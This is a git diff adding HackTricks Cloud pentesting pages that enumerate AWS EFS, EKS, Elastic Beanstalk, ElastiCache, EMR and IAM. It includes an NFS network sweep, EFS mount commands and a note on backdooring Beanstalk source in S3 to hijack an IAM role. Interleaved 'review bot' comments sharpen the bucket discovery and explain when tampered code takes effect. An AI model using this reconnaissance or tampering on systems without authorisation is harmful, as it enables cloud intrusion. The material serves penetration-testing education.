+{% endhint %} + +## EFS + +### Basic Information + +Amazon Elastic File System (EFS) is presented as a **fully managed, scalable, and elastic network file system** by AWS. The service facilitates the creation and configuration of **file systems** that can be concurrently accessed by multiple EC2 instances and other AWS services. The key features of EFS include its ability to automatically scale without manual intervention, provision low-latency access, support high-throughput workloads, guarantee data durability, and seamlessly integrate with various AWS security mechanisms. + +By **default**, the EFS folder to mount will be **`/`** but it could have a **different name**. + +### Network Access + +An EFS is created in a VPC and would be **by default accessible in all the VPC subnetworks**. However, the EFS will have a Security Group. In order to **give access to an EC2** (or any other AWS service) to mount the EFS, it’s needed to **allow in the EFS security group an inbound NFS** (2049 port) **rule from the EC2 Security Group**. + +Without this, you **won't be able to contact the NFS service**. 
+ +For more information about how to do this check: [https://stackoverflow.com/questions/38632222/aws-efs-connection-timeout-at-mount](https://stackoverflow.com/questions/38632222/aws-efs-connection-timeout-at-mount) + +### Enumeration + +```bash +# Get filesystems and access policies (if any) +aws efs describe-file-systems +aws efs describe-file-system-policy --file-system-id + +# Get subnetworks and IP addresses where you can find the file system +aws efs describe-mount-targets --file-system-id +aws efs describe-mount-target-security-groups --mount-target-id +aws ec2 describe-security-groups --group-ids + +# Get other access points +aws efs describe-access-points + +# Get replication configurations +aws efs describe-replication-configurations + +# Search for NFS in EC2 networks +sudo nmap -T4 -Pn -p 2049 --open 10.10.10.0/20 # or /16 to be sure +``` + +{% hint style="danger" %} +It might be that the EFS mount point is inside the same VPC but in a different subnet. If you want to be sure you find all **EFS points it would be better to scan the `/16` netmask**. +{% endhint %} + +### Mount EFS + +{% code overflow="wrap" %} +```bash +sudo mkdir /efs + +## Mount found +sudo apt install nfs-common +sudo mount -t nfs4 -o nfsvers=4.1,rsize=1048576,wsize=1048576,hard,timeo=600,retrans=2,noresvport :/ /efs + +## Mount with efs type +## You need to have installed the package amazon-efs-utils +sudo yum install amazon-efs-utils # If centos +sudo apt-get install amazon-efs-utils # If ubuntu +sudo mount -t efs :/ /efs/ +``` +{% endcode %} + +### IAM Access + +By **default** anyone with **network access to the EFS** will be able to mount, **read and write it even as root user**. 
However, File System policies could be in place **only allowing principals with specific permissions** to access it.\ +For example, this File System policy **won't allow even to mount** the file system if you **don't have the IAM permission**: + +```json +{ + "Version": "2012-10-17", + "Id": "efs-policy-wizard-2ca2ba76-5d83-40be-8557-8f6c19eaa797", + "Statement": [ + { + "Sid": "efs-statement-e7f4b04c-ad75-4a7f-a316-4e5d12f0dbf5", + "Effect": "Allow", + "Principal": { + "AWS": "*" + }, + "Action": "", + "Resource": "arn:aws:elasticfilesystem:us-east-1:318142138553:file-system/fs-0ab66ad201b58a018", + "Condition": { + "Bool": { + "elasticfilesystem:AccessedViaMountTarget": "true" + } + } + } + ] +} +``` + +Or this will **prevent anonymous access**: + +
+ +Note that to mount file systems protected by IAM you MUST use the type "efs" in the mount command: + +```bash +sudo mkdir /efs +sudo mount -t efs -o tls,iam :/ /efs/ +# To use a different pforile from ~/.aws/credentials +# You can use: -o tls,iam,awsprofile=namedprofile +``` + +### Access Points + +**Access points** are **application**-specific entry points **into an EFS file system** that make it easier to manage application access to shared datasets. + +When you create an access point, you can **specify the owner and POSIX permissions** for the files and directories created through the access point. You can also **define a custom root directory** for the access point, either by specifying an existing directory or by creating a new one with the desired permissions. This allows you to **control access to your EFS file system on a per-application or per-user basis**, making it easier to manage and secure your shared file data. + +**You can mount the File System from an access point with something like:** + +```bash +# Use IAM if you need to use iam permissions +sudo mount -t efs -o tls,[iam],accesspoint= \ + /efs/ +``` + +{% hint style="warning" %} +Note that even trying to mount an access point you still need to be able to **contact the NFS service via network**, and if the EFS has a file system **policy**, you need **enough IAM permissions** to mount it. +{% endhint %} + +Access points can be used for the following purposes: + +* **Simplify permissions management**: By defining a POSIX user and group for each access point, you can easily manage access permissions for different applications or users without modifying the underlying file system's permissions. +* **Enforce a root directory**: Access points can restrict access to a specific directory within the EFS file system, ensuring that each application or user operates within its designated folder. This helps prevent accidental data exposure or modification. 
+* **Easier file system access**: Access points can be associated with an AWS Lambda function or an AWS Fargate task, simplifying file system access for serverless and containerized applications. + +## Privesc + +{% content-ref url="../aws-privilege-escalation/aws-efs-privesc.md" %} +[aws-efs-privesc.md](../aws-privilege-escalation/aws-efs-privesc.md) +{% endcontent-ref %} + +## Post Exploitation + +{% content-ref url="../aws-post-exploitation/aws-efs-post-exploitation.md" %} +[aws-efs-post-exploitation.md](../aws-post-exploitation/aws-efs-post-exploitation.md) +{% endcontent-ref %} + +## Persistence + +{% content-ref url="../aws-persistence/aws-efs-persistence.md" %} +[aws-efs-persistence.md](../aws-persistence/aws-efs-persistence.md) +{% endcontent-ref %} + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-eks-enum.md b/pentesting-cloud/aws-security/aws-services/aws-eks-enum.md new file mode 100644 index 0000000000..b99caa6833 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-services/aws-eks-enum.md @@ -0,0 +1,72 @@ +# AWS - EKS Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## EKS + +Amazon Elastic Kubernetes Service (Amazon EKS) is designed to eliminate the need for users to install, operate, and manage their own Kubernetes control plane or nodes. Instead, Amazon EKS manages these components, providing a simplified way to deploy, manage, and scale containerized applications using Kubernetes on AWS. + +Key aspects of Amazon EKS include: + +1. **Managed Kubernetes Control Plane**: Amazon EKS automates critical tasks such as patching, node provisioning, and updates. +2. **Integration with AWS Services**: It offers seamless integration with AWS services for compute, storage, database, and security. +3. **Scalability and Security**: Amazon EKS is designed to be highly available and secure, providing features such as automatic scaling and isolation by design. +4. **Compatibility with Kubernetes**: Applications running on Amazon EKS are fully compatible with applications running on any standard Kubernetes environment. + +#### Enumeration + +```bash +aws eks list-clusters +aws eks describe-cluster --name +# Check for endpointPublicAccess and publicAccessCidrs + +aws eks list-fargate-profiles --cluster-name +aws eks describe-fargate-profile --cluster-name --fargate-profile-name + +aws eks list-identity-provider-configs --cluster-name +aws eks describe-identity-provider-config --cluster-name --identity-provider-config + +aws eks list-nodegroups --cluster-name +aws eks describe-nodegroup --cluster-name --nodegroup-name + +aws eks list-updates --name +aws eks describe-update --name --update-id +``` + +#### Post Exploitation + +{% content-ref url="../aws-post-exploitation/aws-eks-post-exploitation.md" %} +[aws-eks-post-exploitation.md](../aws-post-exploitation/aws-eks-post-exploitation.md) +{% endcontent-ref %} + +## References + +* [https://aws.amazon.com/eks/](https://aws.amazon.com/eks/) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert 
(ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.md b/pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.md new file mode 100644 index 0000000000..a2440c8d39 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.md @@ -0,0 +1,142 @@ +# AWS - Elastic Beanstalk Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Elastic Beanstalk + +Amazon Elastic Beanstalk provides a simplified platform for **deploying, managing, and scaling web applications and services**. It supports a variety of programming languages and frameworks, such as Java, .NET, PHP, Node.js, Python, Ruby, and Go, as well as Docker containers. The service is compatible with widely-used servers including Apache, Nginx, Passenger, and IIS. + +Elastic Beanstalk provides a simple and flexible way to **deploy your applications to the AWS cloud**, without the need to worry about the underlying infrastructure. It **automatically** handles the details of capacity **provisioning**, load **balancing**, **scaling**, and application health **monitoring**, allowing you to focus on writing and deploying your code. + +The infrastructure created by Elastic Beanstalk is managed by **Autoscaling** Groups in **EC2** (with a load balancer). Which means that at the end of the day, if you **compromise the host**, you should know about about EC2: + +{% content-ref url="aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/" %} +[aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum](aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/) +{% endcontent-ref %} + +Moreover, if Docker is used, it’s possible to use **ECS**. + +{% content-ref url="aws-eks-enum.md" %} +[aws-eks-enum.md](aws-eks-enum.md) +{% endcontent-ref %} + +### Application & Environments + +In AWS Elastic Beanstalk, the concepts of an "application" and an "environment" serve different purposes and have distinct roles in the deployment process. + +#### Application + +* An application in Elastic Beanstalk is a **logical container for your application's source code, environments, and configurations**. It groups together different versions of your application code and allows you to manage them as a single entity. +* When you create an application, you provide a name and **description, but no resources are provisioned** at this stage. 
it is simply a way to organize and manage your code and related resources. +* You can have **multiple application versions** within an application. Each version corresponds to a specific release of your code, which can be deployed to one or more environments. + +#### Environment + +* An environment is a **provisioned instance of your application** running on AWS infrastructure. It is **where your application code is deployed and executed**. Elastic Beanstalk provisions the necessary resources (e.g., EC2 instances, load balancers, auto-scaling groups, databases) based on the environment configuration. +* **Each environment runs a single version of your application**, and you can have multiple environments for different purposes, such as development, testing, staging, and production. +* When you create an environment, you choose a platform (e.g., Java, .NET, Node.js, etc.) and an environment type (e.g., web server or worker). You can also customize the environment configuration to control various aspects of the infrastructure and application settings. + +### 2 types of Environments + +1. **Web Server Environment**: It is designed to **host and serve web applications and APIs**. These applications typically handle incoming HTTP/HTTPS requests. The web server environment provisions resources such as **EC2 instances, load balancers, and auto-scaling** groups to handle incoming traffic, manage capacity, and ensure the application's high availability. +2. **Worker Environment**: It is designed to process **background tasks**, which are often time-consuming or resource-intensive operations that don't require immediate responses to clients. The worker environment provisions resources like **EC2 instances and auto-scaling groups**, but it **doesn't have a load balancer** since it doesn't handle HTTP/HTTPS requests directly. 
Instead, it consumes tasks from an **Amazon Simple Queue Service (SQS) queue**, which acts as a buffer between the worker environment and the tasks it processes. + +### Security + +When creating an App in Beanstalk there are 3 very important security options to choose: + +* **EC2 key pair**: This will be the **SSH key** that will be able to access the EC2 instances running the app +* **IAM instance profile**: This is the **instance profile** that the instances will have (**IAM privileges**) + * The autogenerated role is called **`aws-elasticbeanstalk-ec2-role`** and has some interesting access over all ECS, all SQS, DynamoDB elasticbeanstalk and elasticbeanstalk S3 using the AWS managed policies: [AWSElasticBeanstalkWebTier](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSElasticBeanstalkWebTier), [AWSElasticBeanstalkMulticontainerDocker](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSElasticBeanstalkMulticontainerDocker), [AWSElasticBeanstalkWorkerTier](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSElasticBeanstalkWorkerTier). +* **Service role**: This is the **role that the AWS service** will use to perform all the needed actions. Afaik, a regular AWS user cannot access that role. + * This role generated by AWS is called **`aws-elasticbeanstalk-service-role`** and uses the AWS managed policies [AWSElasticBeanstalkEnhancedHealth](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/service-role/AWSElasticBeanstalkEnhancedHealth) and [AWSElasticBeanstalkManagedUpdatesCustomerRolePolicy](https://us-east-1.console.aws.amazon.com/iamv2/home?region=us-east-1#/roles/details/aws-elasticbeanstalk-service-role?section=permissions) + +By default **metadata version 1 is disabled**: + +
+ +### Exposure + +Beanstalk data is stored in a **S3 bucket** with the following name: **`elasticbeanstalk--`**(if it was created in the AWS console). Inside this bucket you will find the uploaded **source code of the application**. + +The **URL** of the created webpage is **`http://-env...elasticbeanstalk.com/`** + +{% hint style="warning" %} +If you get **read access** over the bucket, you can **read the source code** and even find **sensitive credentials** on it + +if you get **write access** over the bucket, you could **modify the source code** to **compromise** the **IAM role** the application is using next time it's executed. +{% endhint %} + +### Enumeration + +{% code overflow="wrap" %} +```bash +# Find S3 bucket +ACCOUNT_NUMBER= +for r in us-east-1 us-east-2 us-west-1 us-west-2 ap-south-1 ap-south-2 ap-northeast-1 ap-northeast-2 ap-northeast-3 ap-southeast-1 ap-southeast-2 ap-southeast-3 ca-central-1 eu-central-1 eu-central-2 eu-west-1 eu-west-2 eu-west-3 eu-north-1 sa-east-1 af-south-1 ap-east-1 eu-south-1 eu-south-2 me-south-1 me-central-1; do aws s3 ls elasticbeanstalk-$r-$ACCOUNT_NUMBER 2>/dev/null && echo "Found in: elasticbeanstalk-$r-$ACCOUNT_NUMBER"; done + +# Get apps and URLs +aws elasticbeanstalk describe-applications # List apps +aws elasticbeanstalk describe-application-versions # Get apps & bucket name with source code +aws elasticbeanstalk describe-environments # List envs +aws elasticbeanstalk describe-environments | grep -E "EndpointURL|CNAME" +aws elasticbeanstalk describe-configuration-settings --application-name --environment-name +aws elasticbeanstalk describe-environment-resources --environment-name # Get env info such as SQS used queues +aws elasticbeanstalk describe-instances-health --environment-name # Get the instances of an environment + +# Get events +aws elasticbeanstalk describe-events +``` +{% endcode %} + +### Unauthenticated Access + +{% content-ref 
url="../aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md" %} +[aws-elastic-beanstalk-unauthenticated-enum.md](../aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md) +{% endcontent-ref %} + +### Persistence + +{% content-ref url="../aws-persistence/aws-elastic-beanstalk-persistence.md" %} +[aws-elastic-beanstalk-persistence.md](../aws-persistence/aws-elastic-beanstalk-persistence.md) +{% endcontent-ref %} + +### Privesc + +{% content-ref url="../aws-privilege-escalation/aws-elastic-beanstalk-privesc.md" %} +[aws-elastic-beanstalk-privesc.md](../aws-privilege-escalation/aws-elastic-beanstalk-privesc.md) +{% endcontent-ref %} + +### Post Exploitation + +{% content-ref url="../aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md" %} +[aws-elastic-beanstalk-post-exploitation.md](../aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md) +{% endcontent-ref %} + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-elasticache.md b/pentesting-cloud/aws-security/aws-services/aws-elasticache.md new file mode 100644 index 0000000000..8839a65982 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-services/aws-elasticache.md @@ -0,0 +1,71 @@ +# AWS - ElastiCache + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
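Review bot: in the `# Find S3 bucket` loop of the Enumeration block in aws-elastic-beanstalk.md, `ACCOUNT_NUMBER=` is left empty, so every iteration lists `elasticbeanstalk-$r-` and the loop can never hit the real bucket; populate it first (`ACCOUNT_NUMBER=$(aws sts get-caller-identity --query Account --output text)` when the credentials belong to the target account) and consider taking the region list from `aws ec2 describe-regions --all-regions --query 'Regions[].RegionName' --output text` instead of the hard-coded list, which goes stale as regions launch. Two smaller points: `2>/dev/null` also hides an `AccessDenied` on a bucket that does exist, so a silent loop does not prove the bucket is absent, and the warning hint's "next time it's executed" should say when a tampered bundle actually lands, i.e. the next deployment of that application version or the next instance launch that pulls the bundle, since overwriting the object in S3 does not change already running instances.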
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## ElastiCache + +AWS ElastiCache is a fully **managed in-memory data store and cache service** that provides high-performance, low-latency, and scalable solutions for applications. It supports two popular open-source in-memory engines: **Redis and Memcached**. ElastiCache **simplifies** the **setup**, **management**, and **maintenance** of these engines, allowing developers to offload time-consuming tasks such as provisioning, patching, monitoring, and **backups**. + +### Enumeration + +```bash +# ElastiCache clusters +## Check the SecurityGroups to later check who can access +## In Redis clusters: Check AuthTokenEnabled to see if you need password +## In memcache clusters: You can find the URL to connect +aws elasticache describe-cache-clusters + +# List all ElastiCache replication groups +## Find here the accesible URLs for Redis clusters +aws elasticache describe-replication-groups + +#List all ElastiCache parameter groups +aws elasticache describe-cache-parameter-groups + +#List all ElastiCache security groups +## If this gives an error it's because it's using SGs from EC2 +aws elasticache describe-cache-security-groups + +#List all ElastiCache subnet groups +aws elasticache describe-cache-subnet-groups + +# Get snapshots +aws elasticache describe-snapshots + +# Get users and groups +aws elasticache describe-user-groups +aws elasticache describe-users + +# List ElastiCache events +aws elasticache describe-events +``` + +### Privesc (TODO) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-emr-enum.md b/pentesting-cloud/aws-security/aws-services/aws-emr-enum.md new file mode 100644 index 0000000000..be430d0552 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-services/aws-emr-enum.md @@ -0,0 +1,86 @@ +# AWS - EMR Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
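Review bot: the comment on `aws elasticache describe-cache-clusters` in aws-elasticache.md says the connection URL and `AuthTokenEnabled` can be read from it, but without `--show-cache-node-info` the per-node `Endpoint` entries (the only place a single-node Redis cluster's address appears) are omitted, so the command should be `aws elasticache describe-cache-clusters --show-cache-node-info`; while checking auth also read `TransitEncryptionEnabled` and `AtRestEncryptionEnabled` from the same output and from `describe-replication-groups`, since a cluster reachable without TLS exposes the AUTH token on the wire. Also, the `### Privesc (TODO)` heading at the end of the hunk ships an empty section; either drop it or link a page the way the EMR and Beanstalk files do.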
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## EMR + +AWS's Elastic MapReduce (EMR) service, starting from version 4.8.0, introduced a **security configuration** feature that enhances data protection by allowing users to specify encryption settings for data at rest and in transit within EMR clusters, which are scalable groups of EC2 instances designed to process big data frameworks like Apache Hadoop and Spark. + +Key characteristics include: + +* **Cluster Encryption Default**: By default, data at rest within a cluster is not encrypted. However, enabling encryption provides access to several features: + * **Linux Unified Key Setup**: Encrypts EBS cluster volumes. Users can opt for AWS Key Management Service (KMS) or a custom key provider. + * **Open-Source HDFS Encryption**: Offers two encryption options for Hadoop: + * Secure Hadoop RPC (Remote Procedure Call), set to privacy, leveraging the Simple Authentication Security Layer. + * HDFS Block transfer encryption, set to true, utilizes the AES-256 algorithm. +* **Encryption in Transit**: Focuses on securing data during transfer. Options include: + * **Open Source Transport Layer Security (TLS)**: Encryption can be enabled by choosing a certificate provider: + * **PEM**: Requires manual creation and bundling of PEM certificates into a zip file, referenced from an S3 bucket. + * **Custom**: Involves adding a custom Java class as a certificate provider that supplies encryption artifacts. + +Once a TLS certificate provider is integrated into the security configuration, the following application-specific encryption features can be activated, varying based on the EMR version: + +* **Hadoop**: + * Might reduce encrypted shuffle using TLS. + * Secure Hadoop RPC with Simple Authentication Security Layer and HDFS Block Transfer with AES-256 are activated with at-rest encryption. +* **Presto** (EMR version 5.6.0+): + * Internal communication between Presto nodes is secured using SSL and TLS. 
+* **Tez Shuffle Handler**: + * Utilizes TLS for encryption. +* **Spark**: + * Employs TLS for the Akka protocol. + * Uses Simple Authentication Security Layer and 3DES for Block Transfer Service. + * External shuffle service is secured with the Simple Authentication Security Layer. + +These features collectively enhance the security posture of EMR clusters, especially concerning data protection during storage and transmission phases. + +#### Enumeration + +```bash +aws emr list-clusters +aws emr describe-cluster --cluster-id +aws emr list-instances --cluster-id +aws emr list-instance-fleets --cluster-id +aws emr list-steps --cluster-id +aws emr list-notebook-executions +aws emr list-security-configurations +aws emr list-studios #Get studio URLs +``` + +#### Privesc + +{% content-ref url="../aws-privilege-escalation/aws-emr-privesc.md" %} +[aws-emr-privesc.md](../aws-privilege-escalation/aws-emr-privesc.md) +{% endcontent-ref %} + +## References + +* [https://cloudacademy.com/course/domain-three-designing-secure-applications-and-architectures/elastic-mapreduce-emr-encryption-1/](https://cloudacademy.com/course/domain-three-designing-secure-applications-and-architectures/elastic-mapreduce-emr-encryption-1/) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-iam-enum.md b/pentesting-cloud/aws-security/aws-services/aws-iam-enum.md new file mode 100644 index 0000000000..40a1e3b6db --- /dev/null +++ b/pentesting-cloud/aws-security/aws-services/aws-iam-enum.md @@ -0,0 +1,440 @@ +# AWS - IAM, Identity Center & SSO Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
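Review bot: under `Hadoop` in the in-transit feature list of aws-emr-enum.md, "Might reduce encrypted shuffle using TLS" is a mangled "MapReduce encrypted shuffle using TLS" and should be corrected, since as written it reads as a hedge rather than the name of the feature. In the Enumeration block, `aws emr list-instance-fleets --cluster-id` only succeeds on clusters built with instance fleets; add `aws emr list-instance-groups --cluster-id` for the more common instance-group clusters, and because `list-security-configurations` only returns names, add `aws emr describe-security-configuration --name` so the reader can actually inspect the at-rest and in-transit settings the first half of the page describes.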
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## IAM + +You can find a **description of IAM** in: + +{% content-ref url="../aws-basic-information/" %} +[aws-basic-information](../aws-basic-information/) +{% endcontent-ref %} + +### Enumeration + +Main permissions needed: + +* `iam:ListPolicies`, `iam:GetPolicy` and `iam:GetPolicyVersion` +* `iam:ListRoles` +* `iam:ListUsers` +* `iam:ListGroups` +* `iam:ListGroupsForUser` +* `iam:ListAttachedUserPolicies` +* `iam:ListAttachedRolePolicies` +* `iam:ListAttachedGroupPolicies` +* `iam:ListUserPolicies` and `iam:GetUserPolicy` +* `iam:ListGroupPolicies` and `iam:GetGroupPolicy` +* `iam:ListRolePolicies` and `iam:GetRolePolicy` + +```bash +# All IAMs +## Retrieves information about all IAM users, groups, roles, and policies +## in your Amazon Web Services account, including their relationships to +## one another. Use this operation to obtain a snapshot of the configura- +## tion of IAM permissions (users, groups, roles, and policies) in your +## account. +aws iam get-account-authorization-details + +# List users +aws iam get-user #Get current user information +aws iam list-users +aws iam list-ssh-public-keys #User keys for CodeCommit +aws iam get-ssh-public-key --user-name --ssh-public-key-id --encoding SSH #Get public key with metadata +aws iam list-service-specific-credentials #Get special permissions of the IAM user over specific services +aws iam get-user --user-name #Get metadata of user, included permissions boundaries +aws iam list-access-keys #List created access keys +## inline policies +aws iam list-user-policies --user-name #Get inline policies of the user +aws iam get-user-policy --user-name --policy-name #Get inline policy details +## attached policies +aws iam list-attached-user-policies --user-name #Get policies of user, it doesn't get inline policies + +# List groups +aws iam list-groups #Get groups +aws iam list-groups-for-user --user-name #Get groups of a user +aws iam get-group --group-name #Get group name info +## inline policies 
+aws iam list-group-policies --group-name #Get inline policies of the group +aws iam get-group-policy --group-name --policy-name #Get an inline policy info +## attached policies +aws iam list-attached-group-policies --group-name #Get policies of group, it doesn't get inline policies + +# List roles +aws iam list-roles #Get roles +aws iam get-role --role-name #Get role +## inline policies +aws iam list-role-policies --role-name #Get inline policies of a role +aws iam get-role-policy --role-name --policy-name #Get inline policy details +## attached policies +aws iam list-attached-role-policies --role-name #Get policies of role, it doesn't get inline policies + +# List policies +aws iam list-policies [--only-attached] [--scope Local] +aws iam list-policies-granting-service-access --arn --service-namespaces # Get list of policies that give access to the user to the service +## Get policy content +aws iam get-policy --policy-arn +aws iam list-policy-versions --policy-arn +aws iam get-policy-version --policy-arn --version-id + +# Enumerate providers +aws iam list-saml-providers +aws iam get-saml-provider --saml-provider-arn +aws iam list-open-id-connect-providers +aws iam get-open-id-connect-provider 